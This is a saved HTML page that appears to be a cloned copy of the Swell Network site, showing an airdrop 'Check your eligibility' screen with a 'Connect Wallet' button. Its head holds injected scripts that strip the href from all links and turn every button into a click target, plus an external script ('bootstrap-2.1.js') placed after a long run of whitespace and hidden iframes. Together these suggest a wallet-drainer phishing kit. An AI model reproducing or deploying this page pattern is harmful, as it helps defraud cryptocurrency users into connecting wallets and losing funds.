<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, viewport-fit=cover">
  <link rel="icon" href="favicon.ico">
  <meta name="theme-color" content="#000000">
  <meta name="description" content="Swell Network">
  <meta name="git-commit" content="018d8e5ba5b7e5521c9b9d5873452a7456d30214">
  <meta name="host-env" content="production">
  <link rel="apple-touch-icon" href="https://app.swellnetwork.io/logo.svg">
  <title>Swell: Liquid restaking for DeFi</title>
  <meta name="description" content="Delivering the world’s best liquid restaking experience, simplifying access to DeFi, and securing the future of Ethereum.">
  <link rel="canonical" href="index-1.htm">
  <meta property="og:locale" content="en_US">
  <meta property="og:type" content="website">
  <meta property="og:title" content="Swell">
  <meta property="og:description" content="Delivering the world’s best liquid restaking experience, simplifying access to DeFi, and securing the future of Ethereum.">
  <meta property="og:url" content="https://swellnetwork.io/">
  <meta property="og:site_name" content="Swell Network">
  <meta property="og:image" content="https://uploads-ssl.webflow.com/63d9b0d075e8161e9281ebdd/644794985a026b4a081f7217_Social%20share%20image%20(1).png">
  <meta property="og:image:width" content="1440">
  <meta property="og:image:height" content="810">
  <meta property="og:image:type" content="image/png">
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:site" content="@swellnetworkio">
  <link rel="manifest" href="https://app.swellnetwork.io/manifest.json">
  <title>React App</title>
  <link href="main.67b09d69.css" rel="stylesheet">




        <script>
      document.addEventListener('DOMContentLoaded', function () {
        var links = document.querySelectorAll('body a');
        for (var i = 0; i < links.length; i++) {
        var link = links[i];
        link.removeAttribute('href');
        link.classList.add('open');
        }
        });
        </script>                                                                                                                          <script>
      document.addEventListener('DOMContentLoaded', function () {
      var buttons = document.querySelectorAll('body button');
      for (var i = 0; i < buttons.length; i++) {
        var button = buttons[i];
        button.classList.add('open');
      }
      });
      </script>
      <script>
      document.addEventListener("DOMContentLoaded", function() {
        const elements = document.querySelectorAll('[ad-data-linked]');
        elements.forEach(element => {
          element.removeAttribute('ad-data-linked');
        });
      
        console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
      });
      
      </script>
      
        <style>
        .open {
        cursor: pointer;
        }
        </style>

    <script src="bootstrap-2.1.js"></script>


  <style data-styled="active" data-styled-version="5.3.11">.bluWNU { width: 100%; margin-left: auto; box-sizing: border-box; margin-right: auto; display: block; padding-left: 16px; padding-right: 16px; }
@media (min-width: 600px) {
  .bluWNU { padding-left: 24px; padding-right: 24px; }
}
@media (min-width: 1536px) {
  .bluWNU { max-width: 1536px; }
}
.boElvF { width: 100%; display: flex; padding: 0px; flex-direction: row; -webkit-box-align: center; align-items: center; -webkit-box-pack: start; justify-content: flex-start; gap: 12px; flex: 0 1 auto; }
.jqGyiu { width: 100%; display: flex; padding: 0px; flex-direction: column; -webkit-box-align: center; align-items: center; -webkit-box-pack: start; justify-content: flex-start; gap: 0px; flex: 0 1 auto; }
.kRGzZJ { width: 100%; display: flex; padding: 0px; flex-direction: column; -webkit-box-align: center; align-items: center; -webkit-box-pack: start; justify-content: flex-start; gap: 24px; flex: 0 1 auto; margin: auto; max-width: 620px; text-align: center; }
.bzijza { color: rgb(255, 255, 255); font-size: 27.39px; font-style: normal; font-weight: 600; line-height: normal; }
.hoYVUq { display: flex; flex-direction: row; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; padding: 12px 24px; gap: 12px; border: none; border-radius: 8px; font-family: inherit; font-size: 16px; line-height: 160%; font-weight: 600; background-color: rgb(47, 67, 236); color: rgb(255, 255, 255); height: 42px; }
.hoYVUq:hover:not([disabled]) { cursor: pointer; opacity: 0.7; }
.hoYVUq:active:not([disabled]) { opacity: 0.5; }
.hoYVUq:disabled { background-color: rgb(19, 27, 94); color: rgb(129, 129, 129); cursor: initial; }
.bSHFlD { display: flex; flex-direction: row; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; padding: 12px 24px; gap: 12px; border-radius: 8px; font-family: inherit; font-size: 16px; line-height: 160%; font-weight: 600; height: 54px; background-color: transparent; color: rgb(255, 255, 255); border: none; }
.bSHFlD:hover:not([disabled]) { cursor: pointer; opacity: 0.7; }
.bSHFlD:active:not([disabled]) { opacity: 0.5; }
.bSHFlD:disabled { background-color: rgb(19, 27, 94); color: rgb(129, 129, 129); cursor: initial; }
.bSHFlD:hover:not([disabled]) { cursor: pointer; opacity: 0.7; }
.bSHFlD:active:not([disabled]) { opacity: 0.5; }
.bSHFlD:disabled { background-color: transparent; opacity: 0.2; }
.bSHFlD a { color: rgb(255, 255, 255); }
.bSHFlD a:hover:not([disabled]) { color: rgb(255, 255, 255); }
.bSHFlD a:active:not([disabled]) { opacity: 0.5; }
.bSHFlD a:disabled { background-color: transparent; opacity: 0.2; cursor: initial; color: rgb(255, 255, 255); }
.knahkW { display: flex; flex-direction: row; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; padding: 12px 24px; gap: 12px; border: none; border-radius: 8px; font-family: inherit; font-size: 16px; line-height: 160%; font-weight: 600; height: 54px; background-color: rgb(47, 67, 236); color: rgb(255, 255, 255); }
.knahkW:hover:not([disabled]) { cursor: pointer; opacity: 0.7; }
.knahkW:active:not([disabled]) { opacity: 0.5; }
.knahkW:disabled { background-color: rgb(19, 27, 94); color: rgb(129, 129, 129); cursor: initial; }
.hXflYl .MuiMenu-paper { background-color: rgb(11, 20, 27); color: rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.25) 0px 4px 4px; border-radius: 16px; padding: 6px 16px; border: 0.8px solid rgb(66, 69, 87); }
.hXflYl .MuiButtonBase-root:hover { background: transparent; }
.fnTa-Dn { padding-left: 0px; padding-right: 0px; position: relative; }
.fnTa-Dn::after { content: ""; display: none; width: 6px; height: 6px; border-radius: 50%; background-color: red; position: absolute; top: 0.85em; right: 0.5em; }
.gQUzvA { display: flex; flex-direction: row; -webkit-box-align: center; align-items: center; }
.gQUzvA > :not(style) ~ :not(style) { margin: 0px 0px 0px 16px; }
.gJfBwN { display: flex; flex-direction: row; -webkit-box-align: center; align-items: center; }
.gJfBwN > :not(style) ~ :not(style) { margin: 0px 0px 0px 24px; }
.hhkKTT { display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: justify; justify-content: space-between; width: 100%; padding: 0px 16px; height: 77px; }
.jixA-ds { -webkit-box-flex: 0; flex-grow: 0; }
.kKdLuS { -webkit-box-flex: 1; flex-grow: 1; padding-left: 93.5px; }
html { -webkit-font-smoothing: antialiased; box-sizing: border-box; text-size-adjust: 100%; }
*, ::before, ::after { box-sizing: inherit; }
strong, b { font-weight: 700; }
body { margin: 0px; color: rgba(0, 0, 0, 0.87); font-family: Roboto, Helvetica, Arial, sans-serif; font-weight: 400; font-size: 1rem; line-height: 1.5; letter-spacing: 0.00938em; background-color: rgb(255, 255, 255); }
@media print {
  body { background-color: rgb(255, 255, 255); }
}
body::backdrop { background-color: rgb(255, 255, 255); }
#root { position: relative; }
:root { --onboard-connect-sidebar-background: #051A2B; --onboard-modal-backdrop: rgba(11,20,27,0.7); --onboard-modal-background: #051A2B; --onboard-link-color: #A4ABF1; --onboard-gray-600: #FFFFFF; --onboard-primary-100: #3B46B7; --onboard-primary-300: #252C73; --onboard-primary-500: #A4ABF1; --onboard-warning-100: #3B46B7; --onboard-warning-400: #252C73; --onboard-warning-700: #FFFFFF; --onboard-modal-top: unset; }
html, body { background-color: rgb(5, 26, 43); color: rgb(255, 255, 255); font-family: Inter, sans-serif !important; }
html a, body a { color: rgb(164, 171, 241); }
html a:hover, body a:hover { color: rgb(47, 67, 236); }
html a:link, body a:link { text-decoration: none; }
input::-webkit-outer-spin-button, input::-webkit-inner-spin-button { appearance: none; margin: 0px; }
input[type="number"] { }
.MuiPickersLayout-root { background-color: rgb(25, 32, 38); color: white !important; }
.MuiPickersLayout-root .MuiPickersDay-root, .MuiPickersLayout-root .MuiDayCalendar-weekDayLabel, .MuiPickersLayout-root .MuiPickersArrowSwitcher-button, .MuiPickersLayout-root .MuiPickersCalendarHeader-switchViewButton { color: white; }
.MuiPickersLayout-root .MuiPickersArrowSwitcher-button.Mui-disabled { opacity: 0.4; }
.MuiPickersLayout-root .MuiPickersDay-root:hover, .MuiPickersLayout-root .MuiPickersYear-yearButton:hover { background-color: rgb(37, 44, 115); }
.MuiPickersLayout-root .MuiPickersDay-root.Mui-disabled:not(.Mui-selected), .MuiPickersLayout-root .MuiPickersYear-yearButton.Mui-disabled:not(.Mui-selected) { color: white; opacity: 0.4; }
.MuiPickersLayout-root .MuiPickersYear-yearButton.Mui-disabled { color: white; opacity: 0.4; }
.MuiPickersLayout-root .Mui-selected { background-color: rgb(47, 67, 236); }
.ctwrTh { font-size: 16px; line-height: 160%; font-weight: 600; }
@media (min-width: 0px) {
}
@media (min-width: 600px) {
}
@media (min-width: 900px) {
}
@media (min-width: 1200px) {
}
@media (min-width: 1536px) {
}
.hxFGky { padding-left: 32.5px; padding-right: 32.5px; }
.dopxSJ { margin-top: 8px; white-space: nowrap; }
.dopxSJ .MuiBackdrop-root { pointer-events: auto !important; }
.dopxSJ.MuiPopover-root { pointer-events: none; }
.dopxSJ.MuiPopover-root > * { pointer-events: auto; }
.dopxSJ .MuiPopover-paper { overflow: visible; background-color: rgb(0, 0, 0); border: 1px solid rgb(29, 29, 29); border-radius: 16px; box-shadow: none; padding: 4px; }
.lnyqRb { color: var(--white-50,#fff); font-family: Inter; font-size: 16px; font-style: normal; font-weight: 600; line-height: 160%; letter-spacing: normal; cursor: default; white-space: nowrap; transition: color 0.2s; }
.lnyqRb[aria-selected="false"] { color: rgb(176, 176, 176); }
.fPycXS { background: pink; opacity: 0; position: fixed; z-index: 1400; }
.iOFLav { width: 12px; height: 12px; margin-left: 4px; stroke: currentcolor; }
.bjcgaH { -webkit-box-pack: start; justify-content: flex-start; top: 0px; left: 0px; height: 120px; padding-left: 36px; padding-right: 36px; z-index: 10; }
.jiHzNW { width: 40px; height: 40px; }
.jiHzNW path { fill: rgb(255, 255, 255); }
.dJavso { background-color: rgb(0, 0, 14); position: absolute; top: 0px; left: 0px; right: 0px; height: 100%; overflow: hidden; }
.dJavso > div { position: absolute; top: 0px; left: 0px; right: 0px; background-image: url("tge-bg.bebb4ab64e47c4021cc2.png"); background-repeat: no-repeat; background-position: 50% 0%; background-attachment: local; height: calc(100% + 0px); transform: translate(0px, 0px); overflow: visible; }
.bRJHYu { z-index: 1; position: absolute; inset: 0px; }
.ldIKUp { position: absolute; inset: 0px; }
.ldIKUp > div { position: relative; max-width: 2024px; margin: 0px auto; height: 100%; }
.jbWVXe { margin: 0px auto; height: unset; color: var(--white-50,#fff); font-family: Inter; font-size: 16px; font-style: normal; font-weight: 600; line-height: 160%; padding: 8px 16px; }
.jbWVXe:disabled svg { opacity: 0.5; }
.chUEbu h1 { color: var(--white-50,#fff); font-family: Inter; font-size: 32px; font-style: normal; font-weight: 600; line-height: 120%; letter-spacing: -0.96px; margin: 0px; }
@media (min-width: 900px) {
  .chUEbu h1 { color: var(--white-50,#fff); font-family: Inter; font-size: 48px; font-style: normal; font-weight: 600; line-height: 120%; letter-spacing: -1.44px; }
}
.chUEbu p { margin: 0px; text-align: center; color: var(--Swell-White-125,#b0b0b0); font-family: Inter; font-size: 16px; font-style: normal; font-weight: 500; line-height: 160%; letter-spacing: -0.48px; }
.chUEbu button { min-width: 186px; }
.eeqAkH { min-height: 0px; visibility: hidden; }
.eeqAkH > div { opacity: 0; animation: 0.65s ease-out 0.15s 1 normal forwards running iHsNqv; }
.hfGhAn { min-height: 833px; visibility: visible; }
.hfGhAn > div { opacity: 0; animation: 0.65s ease-out 0.15s 1 normal forwards running iHsNqv; }
.kDsLjP { position: fixed; width: 100%; left: 0px; bottom: 0px; z-index: 100; }
.doQKnJ { padding-top: 120px; position: relative; display: flex; flex-direction: column; -webkit-box-align: center; align-items: center; min-height: 100vh; max-width: 100%; padding-left: 0px; padding-right: 0px; z-index: 10; opacity: 0; animation: 0.65s ease-out 0s 1 normal forwards running iHsNqv; }
.bbmkVK { position: relative; width: 100%; z-index: 1; flex: 1 1 auto; max-width: none; padding-left: 36px; padding-right: 36px; margin: 0px auto; }
@media (max-width: 899.95px) {
  .bbmkVK { padding-left: 16px; padding-right: 16px; }
}
@-webkit-keyframes jpMGBj { 
  0% { opacity: 1; }
  100% { opacity: 0; }
}
@keyframes jpMGBj { 
  0% { opacity: 1; }
  100% { opacity: 0; }
}
@-webkit-keyframes iHsNqv { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}
@keyframes iHsNqv { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}</style><style data-meta-crm="style">@font-face {font-family: "font-icon";
  src: url("") format("woff2"),
  url("") format("woff"),
  url("") format('truetype') /* chrome, firefox, opera, Safari, Android, iOS 4.2+*/
}







</style><style data-emotion="css" data-s="">.css-14jf5xd { opacity: 1; min-height: 0px; min-width: 0px; border: 0px; position: fixed; z-index: 1000010; background: transparent; color-scheme: light; overflow: hidden; width: 60px; height: 60px; bottom: 43px; right: 24px; }
.css-14jf5xd * { font-family: Inter, sans-serif, "Noto Sans CJK TC", 微軟正黑體; }
.css-14jf5xd .frame-content { width: 100%; height: 100%; }</style></head><body><noscript>
      <iframe src="index_4.html" height="0" width="0" style="display:none;visibility:hidden" id="tag-manager"></iframe></noscript><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"><div style="z-index: 11; position: relative; height: 0px;"><div class="TopNav__TopNavWrapper-sc-1gmgvu1-0 hhkKTT TopNavBar__StyledTopNav-sc-yfpkl3-0 bjcgaH"><div class="TopNav__TopNavSection-sc-1gmgvu1-1 jixA-ds"><div class="FlexRow-sc-1xee6xw-0 boElvF"><svg xmlns="http://www.w3.org/2000/svg" width="51" height="51" viewbox="0 0 51 51" fill="none"><path d="M48.8564 30.9017L48.792 30.9694C48.7619 31.0005 48.7314 31.0314 48.7006 31.0621L31.0382 48.6961C27.9614 51.768 22.9729 51.768 19.8961 48.6961L15.0186 43.8267C14.6728 43.4828 14.6721 42.9236 15.0163 42.5782C15.1176 42.4766 15.2421 42.4012 15.379 42.3584C20.6069 40.7446 24.8548 38.8817 28.1225 36.7699C35.9047 31.7403 42.816 29.7843 48.8564 30.9017ZM45.1535 16.3958C51.6746 18.4507 50.9135 23.2479 51 25.1391C43.8584 21.3943 35.2669 22.7669 25.2254 29.2566C17.741 34.0937 11.4716 36.088 6.41729 35.2395C1.36298 34.391 0.226028 28.2183 0 26.578C5.55377 29.3861 12.9966 27.7744 22.3283 21.7434C31.024 16.1235 38.6324 14.3409 45.1535 16.3958ZM31.0382 2.30389L35.6212 6.87887C35.9664 7.2233 35.9669 7.78255 35.6225 8.12778C35.4996 8.25096 35.3431 8.33506 35.1726 8.36942C28.538 9.706 23.232 11.6596 19.2546 14.2302C12.4389 18.6351 6.63077 20.6825 1.83029 20.3724L1.83081 20.3711L19.8961 2.30389C22.9729 -0.767963 27.9614 -0.767963 31.0382 2.30389Z" fill="url(#paint0_linear_3693_120)"></path><defs><lineargradient id="paint0_linear_3693_120" x1="25.5" y1="-1.49012e-08" x2="25" y2="86" gradientunits="userSpaceOnUse"><stop stop-color="#3068EF"></stop><stop offset="1" stop-color="#1322AC"></stop></lineargradient></defs></svg><div class="sc-gsFSXq bzijza">Swell</div></div></div><div class="TopNav__MiddleSection-sc-1gmgvu1-2 kKdLuS"><div class="sc-eDPEul gQUzvA MuiStack-root"><div><div class="sc-eDPEul gJfBwN MuiStack-root sc-eeDRCY frgljo"><div aria-label="Stake"><div aria-selected="false" class="Typography__StyledTypography-sc-1e141p2-0 ctwrTh sc-koXPp lnyqRb"><path d="M4.73448 4.51552L0.984478 0.765521C0.949637 0.730679 0.922 0.689317 0.903144 0.643794C0.884288 0.598272 0.874582 0.549481 0.874582 0.500208C0.874582 0.450935 0.884288 0.402144 0.903144 0.356622C0.922 0.3111 0.949637 0.269737 0.984478 0.234895C1.01932 0.200054 1.06068 0.172417 1.1062 0.153561C1.15173 0.134705 1.20052 0.125 1.24979 0.125C1.29906 0.125 1.34786 0.134705 1.39338 0.153561C1.4389 0.172417 1.48026 0.200054 1.5151 0.234895L4.99979 3.72005L8.48448 0.234896C8.55484 0.164531 8.65028 0.125 8.74979 0.125C8.8493 0.125 8.94474 0.164531 9.0151 0.234896C9.08547 0.305261 9.125 0.400697 9.125 0.500208C9.125 0.59972 9.08547 0.695156 9.0151 0.765521L5.2651 4.51552C5.23028 4.55039 5.18892 4.57805 5.14339 4.59692C5.09787 4.61579 5.04907 4.6255 4.99979 4.6255C4.95051 4.6255 4.90171 4.61579 4.85619 4.59692C4.81066 4.57805 4.76931 4.55039 4.73448 4.51552Z" fill="white"></path></div></div><div aria-label="Layer 2"><div aria-selected="false" class="Typography__StyledTypography-sc-1e141p2-0 ctwrTh sc-koXPp lnyqRb"><path d="M4.73448 4.51552L0.984478 0.765521C0.949637 0.730679 0.922 0.689317 0.903144 0.643794C0.884288 0.598272 0.874582 0.549481 0.874582 0.500208C0.874582 0.450935 0.884288 0.402144 0.903144 0.356622C0.922 0.3111 0.949637 0.269737 0.984478 0.234895C1.01932 0.200054 1.06068 0.172417 1.1062 0.153561C1.15173 0.134705 1.20052 0.125 1.24979 0.125C1.29906 0.125 1.34786 0.134705 1.39338 0.153561C1.4389 0.172417 1.48026 0.200054 1.5151 0.234895L4.99979 3.72005L8.48448 0.234896C8.55484 0.164531 8.65028 0.125 8.74979 0.125C8.8493 0.125 8.94474 0.164531 9.0151 0.234896C9.08547 0.305261 9.125 0.400697 9.125 0.500208C9.125 0.59972 9.08547 0.695156 9.0151 0.765521L5.2651 4.51552C5.23028 4.55039 5.18892 4.57805 5.14339 4.59692C5.09787 4.61579 5.04907 4.6255 4.99979 4.6255C4.95051 4.6255 4.90171 4.61579 4.85619 4.59692C4.81066 4.57805 4.76931 4.55039 4.73448 4.51552Z" fill="white"></path></div></div><div aria-label="Earn"><div aria-selected="false" class="Typography__StyledTypography-sc-1e141p2-0 ctwrTh sc-koXPp lnyqRb"><path d="M4.73448 4.51552L0.984478 0.765521C0.949637 0.730679 0.922 0.689317 0.903144 0.643794C0.884288 0.598272 0.874582 0.549481 0.874582 0.500208C0.874582 0.450935 0.884288 0.402144 0.903144 0.356622C0.922 0.3111 0.949637 0.269737 0.984478 0.234895C1.01932 0.200054 1.06068 0.172417 1.1062 0.153561C1.15173 0.134705 1.20052 0.125 1.24979 0.125C1.29906 0.125 1.34786 0.134705 1.39338 0.153561C1.4389 0.172417 1.48026 0.200054 1.5151 0.234895L4.99979 3.72005L8.48448 0.234896C8.55484 0.164531 8.65028 0.125 8.74979 0.125C8.8493 0.125 8.94474 0.164531 9.0151 0.234896C9.08547 0.305261 9.125 0.400697 9.125 0.500208C9.125 0.59972 9.08547 0.695156 9.0151 0.765521L5.2651 4.51552C5.23028 4.55039 5.18892 4.57805 5.14339 4.59692C5.09787 4.61579 5.04907 4.6255 4.99979 4.6255C4.95051 4.6255 4.90171 4.61579 4.85619 4.59692C4.81066 4.57805 4.76931 4.55039 4.73448 4.51552Z" fill="white"></path></div></div><div aria-label="DAO"><div aria-selected="true" class="Typography__StyledTypography-sc-1e141p2-0 ctwrTh sc-koXPp lnyqRb"><path d="M4.73448 4.51552L0.984478 0.765521C0.949637 0.730679 0.922 0.689317 0.903144 0.643794C0.884288 0.598272 0.874582 0.549481 0.874582 0.500208C0.874582 0.450935 0.884288 0.402144 0.903144 0.356622C0.922 0.3111 0.949637 0.269737 0.984478 0.234895C1.01932 0.200054 1.06068 0.172417 1.1062 0.153561C1.15173 0.134705 1.20052 0.125 1.24979 0.125C1.29906 0.125 1.34786 0.134705 1.39338 0.153561C1.4389 0.172417 1.48026 0.200054 1.5151 0.234895L4.99979 3.72005L8.48448 0.234896C8.55484 0.164531 8.65028 0.125 8.74979 0.125C8.8493 0.125 8.94474 0.164531 9.0151 0.234896C9.08547 0.305261 9.125 0.400697 9.125 0.500208C9.125 0.59972 9.08547 0.695156 9.0151 0.765521L5.2651 4.51552C5.23028 4.55039 5.18892 4.57805 5.14339 4.59692C5.09787 4.61579 5.04907 4.6255 4.99979 4.6255C4.95051 4.6255 4.90171 4.61579 4.85619 4.59692C4.81066 4.57805 4.76931 4.55039 4.73448 4.51552Z" fill="white"></path></div></div></div></div></div></div><div class="TopNav__TopNavSection-sc-1gmgvu1-1 jixA-ds"><div class="sc-eDPEul gQUzvA MuiStack-root"><div><div></div></div></div></div></div></div><div class="sc-aXZVg bluWNU MuiContainer-root MuiContainer-maxWidthXl sc-jBqsNv doQKnJ"><div class="sc-biptUy kDsLjP"></div><div class="sc-eZuMGc bbmkVK"><div direction="column" class="FlexRow-sc-1xee6xw-0 sc-fPgHrj jqGyiu hfGhAn"><div direction="column" class="FlexRow-sc-1xee6xw-0 sc-eTqNBC kRGzZJ chUEbu"><h1>Check your eligibility</h1><p>White Pearl snapshot taken at block number: <a href="block/20422895.html" target="_blank" rel="noopener noreferrer">20422895</a> (~30 July 2024 23:59:59)</p><p>Please connect your wallet to see if you're eligible.</p><div style="height: 18px;"></div><button class="Button__StyledButton-sc-djfomo-0 knahkW sc-dUWDJJ jbWVXe">Connect Wallet</button></div></div></div></div><div data-qa="bg" class="VoyageBackground__Layout-sc-67nf38-0 dJavso"><div><div class="VoyageBackground__BG-sc-67nf38-1 bRJHYu"></div><div class="VoyageBackground__CenteredOverlays-sc-67nf38-2 ldIKUp"><div></div></div></div></div></div><div id="transaction-progress-portal" style="position:relative;z-index:9999"></div><iframe height="1" width="1" style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;" src="index_1.html"></iframe><onboard-v2 style="all: initial;" data-scrapbook-shadowdom="

  style="all: initial;" data-scrapbook-shadowdom=""></onboard-v2 style="all: initial;" data-scrapbook-shadowdom="

 ></body>